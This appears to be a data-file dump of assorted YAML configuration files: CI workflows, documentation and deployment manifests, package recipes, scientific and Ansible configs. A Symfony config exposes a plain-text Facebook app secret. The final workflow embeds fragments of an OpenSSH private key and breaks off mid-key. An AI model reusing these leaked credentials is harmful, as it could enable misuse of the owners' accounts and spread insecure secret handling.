code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
name: Build & Test
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
test:
name: test
runs-on: ${{ matrix.os }}
strategy:
fail-fast: false
matrix:
os: [ubuntu-latest, macos-latest, windows-latest]
rust:
- 1.36.0
- stable
- beta
- nightly
steps:
- uses: actions/checkout@v2
with:
submodules: true
- uses: actions-rs/toolchain@v1
with:
profile: minimal
toolchain: ${{ matrix.rust }}
override: true
- name: Build
run: cargo build --verbose
- name: Run tests
run: cargo test --verbose
- name: Build docs
run: cargo doc
fmt:
name: rustfmt
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
submodules: true
- uses: actions-rs/toolchain@v1
with:
profile: minimal
toolchain: stable
override: true
- run: rustup component add rustfmt
- uses: actions-rs/cargo@v1
with:
command: fmt
args: --all -- --check
clippy:
name: clippy
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
submodules: true
- uses: actions-rs/toolchain@v1
with:
profile: minimal
toolchain: stable
override: true
- run: rustup component add clippy
- uses: actions-rs/cargo@v1
with:
command: clippy
args: --all --lib --tests -- --deny warnings
# These jobs don't actually test anything; they're only used to tell
# bors the build completed, as there is no practical way to detect when a
# workflow is successful listening to webhooks only.
#
# ALL THE PREVIOUS JOBS NEED TO BE ADDED TO THE `needs` SECTION OF THIS JOB!
end-success:
name: bors build finished
if: success()
runs-on: ubuntu-latest
needs:
- test
- fmt
- clippy
steps:
- name: Mark the job as successful
run: exit 0
end-failure:
name: bors build finished
if: "!success()"
runs-on: ubuntu-latest
needs:
- test
- fmt
- clippy
steps:
- name: Mark the job as a failure
run: exit 1
|
.github/workflows/default.yml
|
site_url: https://inventree.readthedocs.io
site_name: InvenTree Documentation
site_description: InvenTree - Open Source Inventory Management
site_author: InvenTree
# Repository
repo_url: https://github.com/inventree/inventree-docs
repo_name: inventree/inventree-docs
# Theme
theme:
name: material
custom_dir: _includes/overrides
palette:
scheme: default
logo: assets/logo.png
favicon: assets/favicon.ico
icon:
repo: fontawesome/brands/github
features:
- navigation.tabs
- toc.autohide
edit_uri: "" # Disable "Edit" button
extra_css:
- stylesheets/extra.css
- stylesheets/brands.css
- stylesheets/regular.css
- stylesheets/solid.css
extra_javascript:
- javascripts/extra.js
- javascripts/fontawesome.js
- javascripts/brands.js
- javascripts/regular.js
- javascripts/solid.js
# Navigation
nav:
- InvenTree:
- About InvenTree: index.md
- Features: features.md
- What's New: releases/new.md
- FAQ: faq.md
- Contribute: contribute.md
- Credits: credits.md
- Installation:
- Introduction: start/intro.md
- Configuration: start/config.md
- Docker Setup: start/docker.md
- Bare Metal Setup: start/install.md
- Updating: start/update.md
- Migrating: start/migrate.md
- Demo Dataset: start/demo.md
- Parts:
- Parts: part/part.md
- Part Views: part/views.md
- Tracking: part/trackable.md
- Parameters: part/parameter.md
- Templates: part/template.md
- Tests: part/test.md
- Pricing: part/pricing.md
- Stock:
- Stock Items: stock/stock.md
- Adjusting Stock: stock/adjust.md
- Stocktake: stock/stocktake.md
- Stock Expiry: stock/expiry.md
- Stock Ownership: stock/owner.md
- Test Results: stock/test.md
- Build:
- Build Orders: build/build.md
- Bill of Materials: build/bom.md
- Allocating Stock: build/allocate.md
- Companies:
- Suppliers: companies/supplier.md
- Manufacturers: companies/manufacturer.md
- Customers: companies/customer.md
- Purchase Orders: companies/po.md
- Sales Orders: companies/so.md
- Report:
- Templates: report/report.md
- Labels: report/labels.md
- Reports:
- Test Reports: report/test.md
- Packing List: report/pack.md
- Build Order: report/build.md
- Order: report/order.md
- Barcodes: report/barcodes.md
- Admin:
- Admin Interface: admin/admin.md
- User Permissions: admin/permissions.md
- Export Data: admin/export.md
- Import Data: admin/import.md
- Python Shell: admin/shell.md
- Error Logs: admin/logs.md
- Email: admin/email.md
- Background Tasks: admin/tasks.md
- Extend:
- API: extend/api.md
- Python Interface: extend/python.md
- Plugins: extend/plugins.md
- Themes: extend/themes.md
- Third-Party: extend/integrate.md
- App:
- InvenTree App: app/app.md
- Barcodes: app/barcode.md
- Parts: app/part.md
- Stock: app/stock.md
- Settings: app/settings.md
- Privacy: app/privacy.md
- Translation: app/translation.md
- Suggestions: app/issues.md
# Plugins
plugins:
- search
- macros:
include_dir: _includes
# Extensions
markdown_extensions:
- admonition
- attr_list
- meta
- pymdownx.details
- pymdownx.highlight
- pymdownx.superfences
# - pymdownx.emoji:
# emoji_index: !!python/name:materialx.emoji.twemoji
# emoji_generator: !!python/name:materialx.emoji.to_svg
- toc:
permalink: true
# Global Variables
extra:
static_folder_source: ./InvenTree/InvenTree/static/
static_folder_local_default: ./inventree_static/
# Site Analytics
# See https://squidfunk.github.io/mkdocs-material/setup/setting-up-site-analytics/
analytics:
provider: google
property: UA-143467500-1
use_directory_urls: true
strict: true
|
mkdocs.yml
|
---
name: apiserver
instance_groups:
- azs:
- z1
instances: 3
jobs:
- name: webhooks
release: service-fabrik
- name: service-fabrik-apiserver
release: service-fabrik
properties:
admin-username: admin
admin-password: <PASSWORD>
backend_port: 8443 # Bosh links hack
ip: 10.244.14.252
port: 8443
etcd:
url:
- 10.244.14.252:2379
- 10.244.14.253:2379
- 10.244.14.254:2379
ssl:
ca: ((tls_etcd.ca))
crt: ((tls_etcd.certificate))
key: ((tls_etcd.private_key))
tls:
apiserver:
ca: ((tls_etcd.ca))
certificate: ((tls_apiserver.certificate))
private_key: ((tls_apiserver.private_key))
- name: etcd
properties:
tls:
etcd:
ca: ((tls_etcd.ca))
certificate: ((tls_etcd.certificate))
private_key: ((tls_etcd.private_key))
etcdctl:
ca: ((tls_etcdctl.ca))
certificate: ((tls_etcdctl.certificate))
private_key: ((tls_etcdctl.private_key))
peer:
ca: ((tls_etcd_peer.ca))
certificate: ((tls_etcd_peer.certificate))
private_key: ((tls_etcd_peer.private_key))
provides:
etcd:
as: etcd
release: cfcr-etcd
- name: bpm
release: bpm
name: etcd
networks:
- name: default
static_ips:
- 10.244.14.252
- 10.244.14.253
- 10.244.14.254
persistent_disk_type: 10GB
stemcell: default
vm_type: small
releases:
- name: bpm
sha1: 5a03b988c725c6b5a1aed247c8c23c2bff9d421b
url: https://bosh.io/d/github.com/cloudfoundry-incubator/bpm-release?v=0.4.0
version: latest
- name: service-fabrik
version: latest
- name: cfcr-etcd
version: latest
stemcells:
- alias: default
os: ubuntu-trusty
version: latest
update:
canaries: 1
canary_watch_time: 1000-60000
max_in_flight: 1
serial: true
update_watch_time: 1000-60000
variables:
- name: etcd_ca
type: certificate
options:
is_ca: true
common_name: ca
- name: tls_etcd
type: certificate
options:
ca: etcd_ca
common_name: etcd.default.etcd.bosh
alternative_names:
- 10.244.14.252
- 10.244.14.253
- 10.244.14.254
extended_key_usage:
- server_auth
- client_auth
- name: tls_etcd_peer
type: certificate
options:
ca: etcd_ca
common_name: etcd.default.etcd.bosh
alternative_names:
- 10.244.14.252
- 10.244.14.253
- 10.244.14.254
extended_key_usage:
- server_auth
- client_auth
- name: tls_etcdctl
type: certificate
options:
ca: etcd_ca
common_name: etcd_acceptance_client
extended_key_usage:
- client_auth
- name: tls_apiserver
type: certificate
options:
ca: etcd_ca
common_name: apiserver_acceptance_client
alternative_names:
- 10.244.14.252
- 10.244.14.253
- 10.244.14.254
extended_key_usage:
- client_auth
- server_auth
|
templates/apiserver.yml
|
api_name: []
items:
- children:
- azure.identity.credentials.ClientSecretCredential.get_token
class: azure.identity.credentials.ClientSecretCredential
fullName: azure.identity.credentials.ClientSecretCredential
inheritance:
- inheritance:
- type: builtins.object
type: azure.identity._base.ClientSecretCredentialBase
langs:
- python
module: azure.identity.credentials
name: ClientSecretCredential
summary: Authenticates as a service principal using a client ID and client secret.
syntax:
content: ClientSecretCredential(client_id, secret, tenant_id, config=None, **kwargs)
parameters:
- description: the service principal's client ID
id: client_id
type:
- str
- description: one of the service principal's client secrets
id: secret
type:
- str
- description: ID of the service principal's tenant. Also called its 'directory'
ID.
id: tenant_id
type:
- str
- description: optional configuration for the underlying HTTP pipeline
id: config
type:
- <xref:azure.core.configuration>
type: class
uid: azure.identity.credentials.ClientSecretCredential
- class: azure.identity.credentials.ClientSecretCredential
exceptions:
- type: azure.core.exceptions.ClientAuthenticationError
fullName: azure.identity.credentials.ClientSecretCredential.get_token
langs:
- python
module: azure.identity.credentials
name: get_token(*scopes)
summary: Request an access token for *scopes*.
syntax:
content: get_token(*scopes)
parameters:
- description: desired scopes for the token
id: scopes
type:
- str
return:
type:
- <xref:azure.core.credentials.AccessToken>
type: method
uid: azure.identity.credentials.ClientSecretCredential.get_token
references:
- fullName: azure.identity.credentials.ClientSecretCredential.get_token
isExternal: false
name: get_token(*scopes)
parent: azure.identity.credentials.ClientSecretCredential
uid: azure.identity.credentials.ClientSecretCredential.get_token
|
preview/docs-ref-autogen/azure-identity/azure.identity.credentials.ClientSecretCredential.yml
|
{% set version = '1.1-2' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-rsqlite
version: {{ version|replace("-", "_") }}
source:
fn: RSQLite_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/RSQLite_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/RSQLite/RSQLite_{{ version }}.tar.gz
sha256: e4022e6a134bb0ff00d33474d2189a7bb48ee12b513d258e957b78bb1bf4e955
# patches:
# List any patch files here
# - fix.patch
build:
# If this is a new build for the same version, increment the build number.
number: 0
# This is required to make R link correctly on Linux.
rpaths:
- lib/R/lib/
- lib/
# Suggests: DBItest, knitr, rmarkdown, testthat
requirements:
build:
- r-base
- r-bh
- r-dbi >=0.4_9
- r-rcpp >=0.12.7
- r-memoise
- r-plogr
- posix # [win]
- {{native}}toolchain # [win]
- gcc # [not win]
run:
- r-base
- r-bh
- r-dbi >=0.4_9
- r-rcpp >=0.12.7
- r-memoise
- r-plogr
- {{native}}gcc-libs # [win]
- libgcc # [not win]
test:
commands:
# You can put additional test commands to be run here.
- $R -e "library('RSQLite')" # [not win]
- "\"%R%\" -e \"library('RSQLite')\"" # [win]
# You can also put a file called run_test.py, run_test.sh, or run_test.bat
# in the recipe that will be run at test time.
# requires:
# Put any additional test requirements here.
about:
home: https://github.com/rstats-db/RSQLite
license: LGPL (>= 2)
summary: Embeds the 'SQLite' database engine in R and provides an interface compliant with
the 'DBI' package. The source for the 'SQLite' engine (version 3.8.8.2) is included.
license_family: LGPL
# The original CRAN metadata for this package was:
# Package: RSQLite
# Version: 1.1-2
# Date: 2017-01-07
# Title: 'SQLite' Interface for R
# Authors@R: c( person("Kirill", "Muller", role = c("aut", "cre"), email = "<EMAIL>"), person("Hadley", "Wickham", role = c("aut")), person(c("David", "A."), "James", role = "aut"), person("Seth", "Falcon", role = "aut"), person(family = "SQLite Authors", role = "ctb", comment = "for the included SQLite sources"), person("Liam", "Healy", role = "ctb", comment = "for the included SQLite sources"), person(family = "R Consortium", role = "cph"), person(family = "RStudio", role = "cph") )
# Description: Embeds the 'SQLite' database engine in R and provides an interface compliant with the 'DBI' package. The source for the 'SQLite' engine (version 3.8.8.2) is included.
# Depends: R (>= 3.1.0)
# Suggests: DBItest, knitr, rmarkdown, testthat
# Imports: DBI (>= 0.4-9), memoise, methods, Rcpp (>= 0.12.7)
# LinkingTo: Rcpp, BH, plogr
# Encoding: UTF-8
# License: LGPL (>= 2)
# URL: https://github.com/rstats-db/RSQLite
# BugReports: https://github.com/rstats-db/RSQLite/issues
# Collate: 'RcppExports.R' 'SQLiteConnection.R' 'SQLiteDriver.R' 'SQLiteResult.R' 'connect.R' 'copy.R' 'datasetsDb.R' 'deprecated.R' 'dummy.R' 'extensions.R' 'query.R' 'rownames.R' 'table.R' 'transactions.R' 'utils.R' 'zzz.R'
# VignetteBuilder: knitr
# RoxygenNote: 5.0.1.9000
# NeedsCompilation: yes
# Packaged: 2017-01-08 00:12:25 UTC; muelleki
# Author: <NAME> [aut, cre], <NAME> [aut], <NAME> [aut], <NAME> [aut], SQLite Authors [ctb] (for the included SQLite sources), <NAME> [ctb] (for the included SQLite sources), R Consortium [cph], RStudio [cph]
# Maintainer: <NAME> <<EMAIL>>
# Repository: CRAN
# Date/Publication: 2017-01-08 16:57:09
# See
# http://docs.continuum.io/conda/build.html for
# more information about meta.yaml
|
r-packages/r-rsqlite/meta.yaml
|
uid: "com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2*"
fullName: "com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2"
name: "withVirtualNetworkGateway2"
nameWithType: "VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2"
members:
- uid: "com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2(com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayInner)"
fullName: "com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2(VirtualNetworkGatewayInner virtualNetworkGateway2)"
name: "withVirtualNetworkGateway2(VirtualNetworkGatewayInner virtualNetworkGateway2)"
nameWithType: "VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2(VirtualNetworkGatewayInner virtualNetworkGateway2)"
summary: "Set the virtualNetworkGateway2 property: The reference to virtual network gateway resource."
parameters:
- description: "the virtualNetworkGateway2 value to set."
name: "virtualNetworkGateway2"
type: "<xref href=\"com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayInner?alt=com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayInner&text=VirtualNetworkGatewayInner\" data-throw-if-not-resolved=\"False\" />"
syntax: "public VirtualNetworkGatewayConnectionInner withVirtualNetworkGateway2(VirtualNetworkGatewayInner virtualNetworkGateway2)"
returns:
description: "the VirtualNetworkGatewayConnectionInner object itself."
type: "<xref href=\"com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner?alt=com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner&text=VirtualNetworkGatewayConnectionInner\" data-throw-if-not-resolved=\"False\" />"
type: "method"
metadata: {}
package: "com.azure.resourcemanager.network.fluent.models"
artifact: com.azure.resourcemanager:azure-resourcemanager-network:2.2.0
|
docs-ref-autogen/com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2.yml
|
items:
- uid: com.microsoft.rest.retry._retry_handler
id: _retry_handler
parent: com.microsoft.rest.retry
children:
- com.microsoft.rest.retry._retry_handler.intercept(Chain)
- com.microsoft.rest.retry._retry_handler.RetryHandler()
- com.microsoft.rest.retry._retry_handler.RetryHandler(RetryStrategy)
href: com.microsoft.rest.retry._retry_handler.yml
langs:
- java
name: RetryHandler
fullName: com.microsoft.rest.retry.RetryHandler
type: Class
source:
remote: &o0
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
branch: master
repo: https://github.com/Azure/azure-sdk-for-java.git
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
startLine: 18
package: com.microsoft.rest.retry
summary: <p>An instance of this interceptor placed in the request pipeline handles retriable errors. </p>
syntax: &o1
content: public class RetryHandler
inheritance:
- java.lang.Object
- Interceptor
- uid: com.microsoft.rest.retry._retry_handler.intercept(Chain)
id: intercept(Chain)
parent: com.microsoft.rest.retry._retry_handler
href: com.microsoft.rest.retry._retry_handler.yml
langs:
- java
name: intercept(Chain chain)
fullName: Response com.microsoft.rest.retry.RetryHandler.intercept(Chain chain)
type: Method
source:
remote: *o0
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
startLine: 64
package: com.microsoft.rest.retry
syntax:
content: public Response intercept(Chain chain)
parameters:
- id: chain
type: 01552053
return:
type: e9d34ed6
- uid: com.microsoft.rest.retry._retry_handler.RetryHandler()
id: RetryHandler()
parent: com.microsoft.rest.retry._retry_handler
href: com.microsoft.rest.retry._retry_handler.yml
langs:
- java
name: RetryHandler()
fullName: com.microsoft.rest.retry.RetryHandler.RetryHandler()
type: Constructor
source:
remote: *o0
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
startLine: 46
package: com.microsoft.rest.retry
summary: <p>Initialized an instance of <xref href="com.microsoft.rest.retry._retry_handler" data-throw-if-not-resolved="false"></xref> class. Sets default retry strategy base on Exponential Backoff. </p>
syntax:
content: public RetryHandler()
- uid: com.microsoft.rest.retry._retry_handler.RetryHandler(RetryStrategy)
id: RetryHandler(RetryStrategy)
parent: com.microsoft.rest.retry._retry_handler
href: com.microsoft.rest.retry._retry_handler.yml
langs:
- java
name: RetryHandler(RetryStrategy retryStrategy)
fullName: com.microsoft.rest.retry.RetryHandler.RetryHandler(RetryStrategy retryStrategy)
type: Constructor
source:
remote: *o0
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
startLine: 59
package: com.microsoft.rest.retry
summary: >-
<p>Initialized an instance of <xref href="com.microsoft.rest.retry._retry_handler" data-throw-if-not-resolved="false"></xref> class.</p>
<p></p>
syntax:
content: public RetryHandler(RetryStrategy retryStrategy)
parameters:
- id: retryStrategy
type: com.microsoft.rest.retry._retry_strategy
description: <p>retry strategy to use. </p>
references:
- uid: 01552053
spec.java:
- name: Chain
fullName: Chain
- uid: e9d34ed6
spec.java:
- name: Response
fullName: Response
- uid: com.microsoft.rest.retry._retry_strategy
parent: com.microsoft.rest.retry
href: com.microsoft.rest.retry._retry_strategy.yml
name: RetryStrategy
fullName: com.microsoft.rest.retry.RetryStrategy
type: Class
summary: <p>Represents a retry strategy that determines the number of retry attempts and the interval between retries. </p>
syntax:
content: public class RetryStrategy
- uid: com.microsoft.rest.retry._retry_handler
parent: com.microsoft.rest.retry
href: com.microsoft.rest.retry._retry_handler.yml
name: RetryHandler
fullName: com.microsoft.rest.retry.RetryHandler
type: Class
summary: <p>An instance of this interceptor placed in the request pipeline handles retriable errors. </p>
syntax: *o1
|
JavaDoc/api/com.microsoft.rest.retry._retry_handler.yml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2019-01-21 19:24"
game: "Unreal Tournament"
name: "CTF-BT-(bar)ForPawelAndZanmato"
author: "BarCode"
description: "None"
releaseDate: "2014-03"
attachments:
- type: "IMAGE"
name: "CTF-BT-(bar)ForPawelAndZanmato_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/BunnyTrack/B/CTF-BT-(bar)ForPawelAndZanmato_shot_1.png"
originalFilename: "CTF-BT-(bar)ForPawelAndZanmato.zip"
hash: "6344a65b08e8530bb8aaef4c779a984872aec057"
fileSize: 19870442
files:
- name: "CTF-BT-(bar)ForPawelAndZanmato.unr"
fileSize: 8664835
hash: "831bb1501931106d92b7fb169893ea38e1ae3f3f"
- name: "i4Games_BTScripts_200607.u"
fileSize: 335186
hash: "7b3d32af89fcf7a20898aa75e7fd5402a3c88373"
- name: "BarCodeTexture2010.utx"
fileSize: 11506410
hash: "231e49be69cc2040b18f0de141a77def187ad241"
- name: "Pawel-And-Zanmato-BTMusic.umx"
fileSize: 11707467
hash: "2c2726bc4a39ebef367b3a1aaf27334fa79f6cd2"
otherFiles: 0
dependencies:
CTF-BT-(bar)ForPawelAndZanmato.unr:
- status: "OK"
name: "i4Games_BTScripts_200607"
- status: "OK"
name: "BarCodeTexture2010"
- status: "OK"
name: "Pawel-And-Zanmato-BTMusic"
downloads:
- url: "http://www.i4games.eu/maps/CTF-BT-%28bar%29ForPawelAndZanmato.zip"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/BunnyTrack/B/CTF-BT-(bar)ForPawelAndZanmato.zip"
main: true
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/BunnyTrack/B/6/3/44a65b/CTF-BT-(bar)ForPawelAndZanmato.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/BunnyTrack/B/6/3/44a65b/CTF-BT-(bar)ForPawelAndZanmato.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "BunnyTrack"
title: "CTF-BT-(bar)ForPawelAndZanmato Solo Version"
playerCount: "6-12 Gamers"
themes:
Nali Temple: 0.1
Tech: 0.4
Ancient: 0.1
Skaarj Tech: 0.3
Industrial: 0.1
bots: false
|
content/Unreal Tournament/Maps/BunnyTrack/B/6/3/44a65b/ctf-bt-barforpawelandzanmato_[6344a65b].yml
|
file_paths:
input_calibrant_file: ../../../SXRD_raw_data/desy_2021/diffraction_images/LaB6/LaB6_5mm_Dilatometer-00003.tif
# Input file path for the calibrant diffraction pattern image
output_calibration_path: ../../../SXRD_analysis/desy_2021/calibration-pyFAI/DESY_2021_LaB6_1554mm_Dilatometer_pyFAI.poni
# Output file path for the .poni calibration file
input_path: ../../../SXRD_raw_data/desy_2021/diffraction_images/
# Input file path for the diffraction pattern images
input_experiment_list:
- Def_01
- Def_03
- Def_04
- Def_05
- Def_06
- Def_07
- Def_08
- Def_09
- Def_10
- Heat_02
# Input experiment list (name of input folders)
glob_search_term: T*.tif
# Glob search term (common name of the image files)
output_path: ../../../SXRD_analysis/desy_2021/
# Output path for azimuthally integrated or caked data files
output_experiment_list:
- experiment01-deformation
- experiment03-deformation
- experiment04-deformation
- experiment05-deformation
- experiment06-deformation
- experiment07-deformation
- experiment08-deformation
- experiment09-deformation
- experiment10-deformation
- experiment02-heating
# Output experiment list (name of output folders)
setup_inputs:
beam_centre_x: 1034.850
# x-coordinate of the beam-centre in pixels
beam_centre_y: 1027.741
# y-coordinate of the beam-centre in pixels
# Note, this is 2048 - 1020.259 since value from Dioptas is from top rather than bottom
sample_detector_distance: 1554.0496
# Sample-to-detector distance in millimetres (unit used by Fit2d)
wl: 1.240000e-11
# Beam wavelength in metres
pixel_x: 0.000200
# Pixel size in metres (in x)
pixel_y: 0.000200
# Pixel size in metres (in y)
calibrant_type: LaB6
# Calibrant type, eg. CeO2, LaB6, etc.
num_calibration_rings: 14
# Number of calibrant rings used for calibration
refinement_inputs:
number_of_points: 5000
# Number of points used to resolve the intensity profile
number_of_cakes: 72
# Number of cakes for 'caking' the synchrotron diffraction pattern images
pixel_size: 0.200
# Pixel size in millimetres
|
notebooks/yaml/config_desy_2021.yaml
|
---
- name: Check if zpool is configured for iocage
shell: /sbin/zfs get mountpoint {{ iocage_zpool }}/iocage
ignore_errors: true
register: zpool_activated
tags:
- iocage-comb
- jenkins
- iocage-cell
- name: Mark zpool for iocage usage
shell: iocage activate {{ iocage_zpool }}
when:
- zpool_activated is failed
register: zpool_activated
tags:
- iocage-comb
- name: Register iocage mountpoint
shell: /sbin/zfs get -H mountpoint {{ iocage_zpool }}/iocage | awk '{print $3}'
register: iocage_mountpoint
when:
- zpool_activated is succeeded
tags:
- iocage-comb
- jenkins
- iocage-cell
- name: Check if we can skip downloading the release
stat: path='{{ iocage_mountpoint }}{{ iocage_releases_dir }}/{{ iocage_release_version }}'
register: release_dir
tags:
- iocage-comb
- pkg-server
- name: bsdinstall Prepare target area
file: path=/usr/freebsd-dist state=directory
when:
- ansible_connection == "chroot"
tags:
- iocage-comb
- name: bsdinstall Copy files
copy: src=/usr/freebsd-dist/{{ item.name }} dest=/usr/freebsd-dist/{{ item.name }}
with_items:
- { name: "src.txz" }
- { name: "base.txz" }
when:
- ansible_connection == "chroot"
tags:
- iocage-comb
- name: Fetch {{ host_os }} release {{ iocage_release_version }}
shell: echo "{{ iocage_release_version }}" | /usr/local/sbin/iocage fetch ftpfiles="{{ iocage_ftp_files}}" ftphost="{{ iocage_ftp_host }}" ftpdir="{{ iocage_ftp_dir }}"
when:
- release_dir.stat.isdir is undefined
- ansible_connection != "chroot"
tags:
- iocage-comb
- pkg-server
- name: bsdinstall Fetch {{ host_os }} release {{ iocage_release_version }}
shell: echo "{{ iocage_release_version }}" | /usr/local/sbin/iocage fetch ftpfiles="{{ iocage_ftp_files }}" ftplocaldir=/usr/freebsd-dist
when:
- release_dir.stat.isdir is undefined
- ansible_connection == "chroot"
tags:
- iocage-comb
- pkg-server
- name: Check if it is now present
stat: path='{{ iocage_mountpoint }}{{ iocage_releases_dir }}/{{ iocage_release_version }}'
when: release_dir.stat.isdir is undefined
tags:
- iocage-comb
register: release_dir
- name: Create pkglist file
copy: src=pkglist.txt dest='/iocage/jails/pkglist.txt'
# copy: src=pkglist.txt dest='{{ iocage_mountpoint }}{{ iocage_jails_dir }}/pkglist.txt'
tags:
- iocage-comb
- name: Enable iocage service
tags:
- iocage-comb
service:
name: iocage
enabled: true
|
roles/comb/tasks/iocage.yml
|
imports:
- { resource: parameters.ini }
- { resource: security.yml }
framework:
#esi: ~
#translator: { fallback: en }
secret: '%secret%'
charset: UTF-8
router: { resource: "%kernel.root_dir%/config/routing.yml" }
form: true
csrf_protection: true
validation: { enable_annotations: true }
templating: { engines: ['twig'] } #assets_version: SomeVersionScheme
session:
default_locale: '%locale%'
auto_start: true
# Twig Configuration
twig:
debug: '%kernel.debug%'
strict_variables: '%kernel.debug%'
# Assetic Configuration
assetic:
debug: '%kernel.debug%'
use_controller: false
filters:
cssrewrite: ~
# closure:
# jar: %kernel.root_dir%/java/compiler.jar
# yui_css:
# jar: %kernel.root_dir%/java/yuicompressor-2.4.2.jar
# Doctrine Configuration
doctrine:
dbal:
driver: '%database_driver%'
host: '%database_host%'
port: '%database_port%'
dbname: '%database_name%'
user: '%database_user%'
password: '%<PASSWORD>%'
charset: UTF8
orm:
auto_generate_proxy_classes: '%kernel.debug%'
auto_mapping: true
# Swiftmailer Configuration
swiftmailer:
transport: '%mailer_transport%'
host: '%mailer_host%'
username: '%mailer_user%'
password: '%<PASSWORD>%'
jms_security_extra:
secure_controllers: true
secure_all_services: false
fos_facebook:
file: '%kernel.root_dir%/../vendor/facebook/src/base_facebook.php'
alias: facebook
app_id: 199637306764957
secret: 92eac9cab1c2512ec056306b3f72a947
cookie: true
permissions: [email, user_birthday, user_location]
fos_user:
db_driver: mongodb # other valid values are 'orm', 'couchdb'
firewall_name: public
user_class: Acme\DemoBundle\Document\User
doctrine_mongodb:
connections:
default:
server: mongodb://localhost:27017
options:
connect: true
default_database: test_database
document_managers:
default:
# auto_mapping: true
mappings:
AcmeDemoBundle: { type: annotation, dir: Document/ }
services:
my.facebook.user:
class: Acme\DemoBundle\Security\User\Provider\FacebookProvider
arguments:
facebook: "@fos_facebook.api"
userManager: "@fos_user.user_manager"
validator: "@validator"
container: "@service_container"
|
app/config/config.yml
|
version: "2.1"
services:
elasticsearch:
image: docker.elastic.co/elasticsearch/elasticsearch:6.6.1
container_name: elasticsearch
hostname: elasticsearch
environment:
- cluster.name=docker-cluster
- bootstrap.memory_lock=true
- "ES_JAVA_OPTS=-Xms512m -Xmx512m"
ulimits:
memlock:
soft: -1
hard: -1
healthcheck:
test: ["CMD", "curl", "-X", "GET", "http://localhost:9200"]
interval: 30s
timeout: 15s
retries: 15
volumes:
- esdata1:/usr/share/elasticsearch/data
ports:
- "9200:9200"
- "9300:9300"
networks:
- backend-network
kibana:
image: docker.elastic.co/kibana/kibana:6.6.1
container_name: kibana
hostname: kibana
networks:
- backend-network
ports:
- "5601:5601"
environment:
ELASTICSEARCH_HOSTS: http://elasticsearch:9200
healthcheck:
test: ["CMD", "curl", "-X", "GET", "http://localhost:5601"]
interval: 5s
timeout: 15s
retries: 15
links:
- elasticsearch
depends_on:
elasticsearch:
condition: service_healthy
logstash:
image: docker.elastic.co/logstash/logstash:6.6.1
container_name: logstash
hostname: logstash
networks:
- backend-network
command: -f /usr/share/logstash/pipeline/logstash.conf
healthcheck:
test: ["CMD", "curl", "-X", "GET", "http://localhost:9600"]
interval: 60s
timeout: 15s
retries: 15
ports:
- "5000:5000"
- "9600:9600"
volumes:
- ./elk-pipeline/:/usr/share/logstash/pipeline/
links:
- elasticsearch
depends_on:
elasticsearch:
condition: service_healthy
logspout:
image: bekt/logspout-logstash
container_name: logspout
hostname: logspout
networks:
- backend-network
restart: on-failure
environment:
ROUTE_URIS: logstash://logstash:5000
volumes:
- /var/run/docker.sock:/var/run/docker.sock
links:
- logstash
depends_on:
logstash:
condition: service_healthy
volumes:
esdata1:
driver: local
networks:
backend-network:
driver: bridge
|
docker-compose/docker-compose-log.yml
|
name: edjos build automation
on: push
jobs:
build:
name: Digital-Ocean
runs-on: ubuntu-latest
steps:
- name: Digital Ocean Auth
uses: digitalocean/action-doctl@v2.1.0
with:
token: ${{ secrets.DIGITALOCEAN_ACCESS_TOKEN }}
- name: login
run: |
cat <<EOF > .id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
<KEY>
za2X3+ztsVUlD56fphUM8xOc5q1exNPB01VfMcB9AAAFoBb9+F8W/fhfAAAAB3NzaC1yc2
EAAAGBAPQZos89b5UAjUsrDjz6G7Ti1XSp0ztr8ojwiteMcroA95bTy9Zsk4+Jc2qbjm95
o6CaqUBvtM1NhqCKgSAIZB3115F00pUvUlrcOuZ56a8oj4tWElkUfOLcfOTsLaGvXObrhI
CRv3typYpmdmHBraSDWSZUKS2kYZuuX5kvgWCw8aW9pDKx8QMG+LCpVmNKpyCaw9qnHbjD
fc1w9V2ETVFQEDOkXu25IYqOmL8/vJ5aRTQiCf/1crTlDBPl14OtoFk4GT0Mv0hQMZTfPG
AaRaQ+5P0huBZJULpokJsNcG0+xYsem8pOkGZiOApJPijtD9fxQPJ/99iPyD0W8OyGVuSg
AFP+3iQcvAPV8bb/LzgIn0HFAifxnvwtMjptNLRQCtf+WV+aEc6S2iG2kSLkpR2N9FPMyO
